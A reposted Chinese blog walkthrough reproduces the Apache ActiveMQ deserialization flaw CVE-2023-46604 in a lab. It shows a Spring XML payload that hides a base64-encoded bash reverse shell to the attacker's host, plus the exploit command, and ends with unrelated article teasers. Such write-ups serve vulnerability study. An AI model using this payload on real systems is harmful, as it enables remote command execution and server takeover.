ActiveMQ-CVE-2023-46604

ActiveMQ-CVE-2023-46604

bicheng/2024/9/20 23:30:08/文章来源:https://blog.csdn.net/m0_60894143/article/details/140346311

Apache ActiveMQ OpenWire 协议反序列化命令执行漏洞

OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。在Apache ActvieMQ5.18.2版本以及以前，OpenWire协议通信过程中存在一处反序列化漏洞，该漏洞可以允许具有网络访问权限的远程攻击者通过操作OpenWire协议中的序列化类型，导致代理的类路径上任何类实例化，从而执行任意命令。

143为VPS

131为靶机

复现

先将poc移动到VPS /var/www/html目录下

开启http服务

攻击机执行命令

成功

利用反弹shell

将xml改成反弹shell

<?xml version="1.0" encoding="UTF-8" ?>

<beans xmlns="http://www.springframework.org/schema/beans"

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

xsi:schemaLocation="http://www.springframework.org/schema/beans

http://www.springframework.org/schema/beans/spring-beans.xsd">

<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">

<constructor-arg>

<list>

<value>bash</value>

<value>-c</value>

<value>{echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjYyLjE0My8zMTAwNSAwPiYx}|{base64,-d}|{bash,-i}</value>

</list>

</constructor-arg>

</bean>

</beans>

nc和http同时开启

攻击机执行命令

python exploit.py -i 192.168.62.131 -u http://192.168.62.143:8000/poc.xml

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/bicheng/46101.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

opencv 中如何通过欧式距离估算实际距离(厘米)

opencv 中如何通过欧式距离估算实际距离(厘米)

1：这个方法个人测试觉得是正确的，误差较小，目前满足我当前的需求，如果方法不对，请大家评论，完善。 2：确保拍摄的参照物是垂直的，如果不垂直，就会有误差，不垂…

阅读更多...

低代码商城构建专家：Mall-Cook

低代码商城构建专家：Mall-Cook

Mall-Cook：用Mall-Cook，让电商创新触手可及- 精选真开源，释放新价值。概览 Mall-Cook是一个面向未来的商城低代码开发平台，它通过提供直观的可视化界面，让开发者和商家能够快速构建和部署跨平台的电商解决方案。这个…

阅读更多...

微信小程序如何实现登陆和注册功能?

微信小程序如何实现登陆和注册功能?

👨‍💻个人主页：开发者-曼亿点 👨‍💻 hallo 欢迎点赞👍 收藏⭐ 留言📝 加关注✅! 👨‍💻 本文由曼亿点原创 👨‍💻 收录于专栏&#xff1a…

阅读更多...

服务器提交记录有Merge branch消除

服务器提交记录有Merge branch消除

背景：在共同开发分支release上，你提交了commit，push到服务器上时，发现有人先比你push了，所以你得先pull， 后再push，然而pull后自动产生了一个Merge branch的一个commit，这个commit本…

阅读更多...

递归解决换零钱问题--回顾总结之递归的表达能力

递归解决换零钱问题--回顾总结之递归的表达能力

前面为了保持叙述的流畅, 没有做太多的引申, 把总结推迟到了后面. 补上一些总结, 以防止出现 “下面呢? 下面没有了” 的尴尬. 方向性问题虽然题目在一开始就暗示了这一点, 但首先, 我们还是要问, 它能用递归解决吗? 有点怀疑精神是好的, 既要低头走路, 更要抬头看路, 以防…

阅读更多...

JDK14新特征最全详解

JDK14新特征最全详解

JDK 14一共发行了16个JEP(JDK Enhancement Proposals，JDK 增强提案)，筛选出JDK 14新特性。 - 343: 打包工具 (Incubator) - 345: G1的NUMA内存分配优化 - 349: JFR事件流 - 352: 非原子性的字节缓冲区映射 - 358: 友好的空指针异常 - 359: Records…

阅读更多...

【JavaScript】解决 JavaScript 语言报错：Uncaught TypeError: XYZ is not iterable

【JavaScript】解决 JavaScript 语言报错：Uncaught TypeError: XYZ is not iterable

文章目录一、背景介绍常见场景二、报错信息解析三、常见原因分析1. 对非数组类型使用 for...of 循环2. 对非可迭代对象使用扩展运算符3. 在 Promise.all 中传递非可迭代对象4. 使用解构赋值时，右侧值非可迭代四、解决方案与预防措施1. 确保使用可迭代对象2. 使用…

阅读更多...

各种Attention|即插即用|适用于YoloV5、V7、V8、V9、V10（一）

各种Attention|即插即用|适用于YoloV5、V7、V8、V9、V10（一）

摘要本文总结了各种注意力，即插即用，方便大家将注意力加到自己的论文中。 SE import torch from torch import nn class SEAttention(nn.Module): """ SENet（Squeeze-and-Excitation Networks）中的注意力…

阅读更多...

C++进阶（while循环——函数应用）

C++进阶（while循环——函数应用）

知识点代码框架总结输入n组数据 ，对n组数据里面的每一组进行处理（输出、求和、运算、其他） int n;//几组数据cin >> n;//2while(n--){//对每组数据进行处理}看到下面的样例，肌肉型反映出上面的框架//2// 1 2 3// 4 5 6若…

阅读更多...

虚拟机：VMware功能，安装与使用

虚拟机：VMware功能，安装与使用

目录一、虚拟机介绍二、VMware 1.介绍 2.安装 （1）根据提示按步骤安装编辑 （2）更改软件的安装地址编辑 （3）根据自己的需求选择是否需要软件更新编辑 （4）根据需求选择…

阅读更多...

自动驾驶中的人机互相接管问题讨论

自动驾驶中的人机互相接管问题讨论

一、背景人机接管（human takeover）是指在自动驾驶过程中，当系统遇到超出其处理能力或预设安全阈值的情况时，将控制权交还给驾驶员的过程。这一环节的设计直接关系到自动驾驶技术的实用性与安全性，是目前研究和实践中…

阅读更多...

【SQL】MySQL事务的隔离级别和幻读、脏读和不可重复读

【SQL】MySQL事务的隔离级别和幻读、脏读和不可重复读

事务的隔离级别是数据库管理系统提供的一种功能，用于控制事务之间的相互影响程度。常见的隔离级别包括： 读未提交 (Read Uncommitted)：允许一个事务读取另一个事务未提交的数据。读已提交 (Read Committed)：一个事务只能读取另一…

阅读更多...

Python应用爬虫下载QQ音乐歌曲！

Python应用爬虫下载QQ音乐歌曲！

目录： 1.简介怎样实现下载QQ音乐的过程； 2.代码 1.下载QQ音乐的过程首先我们先来到QQ音乐的官网： https://y.qq.com/，在搜索栏上输入一首歌曲的名称； 如我在上输入最美的期待，按回车来到这个画面我们首…

阅读更多...

$[USACO24OPEN] Smaller Averages G （单调性优化dp）$

[USACO24OPEN] Smaller Averages G （单调性优化dp）

来源题目 Bessie 有两个长度为 N的数组（1≤N≤500）。第一个数组的第 i 个元素为 ai（1≤ai≤10^6），第二个数组的第 i个元素为bi（1≤bi≤10^6）。 Bessie 希望将两个数组均划分为若干非空…

阅读更多...

机器学习（五） -- 监督学习（6） --逻辑回归

机器学习（五） -- 监督学习（6） --逻辑回归

系列文章目录及链接上篇：机器学习（五） -- 监督学习（5） -- 线性回归2 下篇：机器学习（五） -- 监督学习（7） --SVM1 前言 tips：标题前有“***”的内…

阅读更多...

uniapp 支付宝小程序芝麻免押免押金

uniapp 支付宝小程序芝麻免押免押金

orderStr参数如下： my.tradePay({orderStr:res, // 完整的支付参数拼接成的字符串，从 alipay.fund.auth.order.app.freeze 接口获取success: (res) > {console.log(免押成功);console.log(JSON.stringify(res),不是JOSN);console.log(JSON.stringify…

阅读更多...

使用机器学习最近邻算法（Nearest Neighbors）进行点云分析 (scikit-learn Open3D numpy)

使用机器学习最近邻算法（Nearest Neighbors）进行点云分析 (scikit-learn Open3D numpy)

使用 NearestNeighbors 进行点云分析在数据分析和机器学习领域，最近邻算法（Nearest Neighbors）是一种常用的非参数方法。它广泛应用于分类、回归和聚类分析等任务。下面将介绍如何使用 scikit-learn 库中的 NearestNeighbors 类来进行点云数…

阅读更多...

[GICv3] 3. 物理中断处理（Physical Interrupt Handling）

[GICv3] 3. 物理中断处理（Physical Interrupt Handling）

中断生命周期外设通过中断信号线生成中断，或者软件生成中断（SGI）。Distributor 和 ReDistributor 配合按照中断分组和中断优先级仲裁后将最高优先级的中断分发到 CPU interface。cpu interface 向中断发送到 PEPE 读取 IAR 寄存器&am…

阅读更多...

使用Java连接星火认知大模型：一个实际案例解析

使用Java连接星火认知大模型：一个实际案例解析

引言： 随着人工智能技术的快速发展，认知大模型如星火在自然语言处理、语音识别等领域发挥着越来越重要的作用。本文将通过一个实际的Java代码示例，详细讲解如何使用Java连接星火认知大模型，并处理其响应。 1.导入依赖&#xff1…

阅读更多...

【防火墙】防火墙安全策略用户认证综合实验

【防火墙】防火墙安全策略用户认证综合实验

实验拓扑及要求拓扑搭建及IP配置防火墙（总公司）和交换机（汇聚生产区和办公区）的接口配置生产区在vlan2，办公区在vlan3，防火墙在G1/0/3接口上创建子接口G1/0/3.1和G1/0/3.2对两个区域分别进行管理交换…

阅读更多...

推荐文章

最新文章